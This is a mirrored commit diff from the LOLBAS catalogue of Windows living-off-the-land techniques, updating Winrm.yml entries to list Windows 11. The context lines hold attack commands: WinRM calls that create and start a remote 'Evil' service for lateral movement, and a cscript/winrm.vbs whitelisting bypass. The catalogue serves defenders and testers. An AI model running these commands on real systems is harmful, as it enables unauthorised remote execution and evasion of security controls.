public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-29 05:31:53 +02:00
Code Issues Projects Releases Wiki Activity

Updating entries that have been confirmed to be working on Windows 11 (21H2)

Browse Source
This commit is contained in:
Wietze
2021-12-14 15:50:17 +00:00
parent f7b30775a4
commit 754a451e76
76 changed files with 221 additions and 215 deletions
Download Patch File Download Diff File Expand all files Collapse all files

6
yml/OSScripts/Winrm.yml
View File

@@ -10,21 +10,21 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1216
OperatingSystem: Windows 10
OperatingSystem: Windows 10, Windows 11
- Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'
Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol
Usecase: Proxy execution
Category: Execute
Privileges: User
MitreID: T1216
OperatingSystem: Windows 10
OperatingSystem: Windows 10, Windows 11
- Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'
Description: Bypass AWL solutions by copying and executing cscript.exe and malicious XSL documents from attacker controlled location
Usecase: Execute aribtrary, unsigned code via XSL script
Category: AWL Bypass
Privileges: User
MitreID: T1216
OperatingSystem: Windows 10
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\winrm.vbs
- Path: C:\Windows\SysWOW64\winrm.vbs